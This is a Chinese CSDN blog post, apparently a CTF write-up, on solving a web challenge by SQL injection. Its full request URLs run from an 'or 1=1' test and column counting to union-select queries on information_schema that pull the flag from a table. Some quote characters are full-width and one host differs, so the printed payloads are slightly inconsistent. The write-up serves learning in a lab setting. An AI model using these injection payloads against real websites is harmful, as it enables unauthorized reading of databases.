从0到1的ctfer成长之路web闯关

本文讲述了作者通过SQL注入技巧逐步揭示网站安全漏洞的过程,从http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=1 的异常回显,到利用information_schema进行数据库字段和表查询,最终获取fl4g表的旗标。
摘要由CSDN通过智能技术生成

第一关

第一步输入

http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=1‘or 1=1--+

发现回显正常,判断有sql注入漏洞(--+为注释符号,还有其他的,自行了解)

第二步输入

http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=1’order by 10--+

无回显,这里用二分法10,5,2发现输入2的时候回显正常,在输入3也正常,但在4的时候无回显,故判断此处数据库有3个字段,因此后面使用联合查找

http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=-1‘union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+

此处database()返回的是该数据库名,MySQL5.0版本后默认自带了一个information_schema,MySQL上所有数据库名,表名,字段名都可以从中查出,为我们注入提供了便利(当然他的本意我想并非如此)。

fl4g,notes

我们可以看到页面返回了此数据库的所有表,一共两个,显然我们需要的是前者,接下来我们查询fl4g中的字段,同样联合查找

http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name="fl4g"--+

回显

fllllag

找到所要字段,最后同样联合查找

http://eci-2ze0y9jcv7gxwyhb5j3e.cloudeci1.ichunqiu.com/index.php?id=-1‘union select 1,2,fllllag from fl4g--+

华丽的获得了第一关的flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

The_All_one

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值